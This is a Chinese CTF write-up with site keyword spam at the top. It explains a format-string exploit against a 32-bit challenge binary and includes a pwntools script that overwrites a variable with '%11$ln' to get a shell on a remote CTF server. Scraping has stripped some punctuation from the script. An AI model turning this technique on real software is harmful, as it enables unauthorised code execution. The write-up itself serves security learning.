2026/1/13 22:28:22
网站建设
项目流程
88个seo网站优化基础知识点,深圳网站优化方式,怎样做网站公司的销售,网站建设价格优惠首先checksec检查保护机制#xff1a;-32位程序-开启了栈溢出保护和栈不可执行保护接下来使用反汇编工具IDA进行分析#xff1a;发现没有后门函数#xff0c;不过有printf函数#xff0c;可触发格式化字符串漏洞#xff0c;再看下面#xff0c;只要让x的值等于4#xff…首先checksec检查保护机制-32位程序-开启了栈溢出保护和栈不可执行保护接下来使用反汇编工具IDA进行分析发现没有后门函数不过有printf函数可触发格式化字符串漏洞再看下面只要让x的值等于4即可拿到shell那么方向就很明显了使用格式化字符串漏洞实现任意地址写将x的值改写为4接下来先找到第一个参数的偏移方便利用格式化字符串漏洞在pwndbg中动态调试先对程序输入一下代码AAAA %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p得到发现0x41414141这个参数在第11位0x41414141以ASCII码转化为字符即为AAAA也就是我们输入的AAAA在第11位处即偏移为11再在IDA中拿到x的地址0x0804A02C然后就是脚本的编写了from pwn import * context(archi386, oslinux, log_leveldebug) #io process(./pwn) # 在本地运行程序。 # gdb.attach(io) # 启动 GDB io connect(node5.buuoj.cn,25207) # 与在线环境交互。 offset 11 aim_addr 0x0804A02C payload p32(aim_addr) b%11$ln io.sendline(payload) io.interactive()这是运行结果拿到shell后输入cat flag即可拿到flag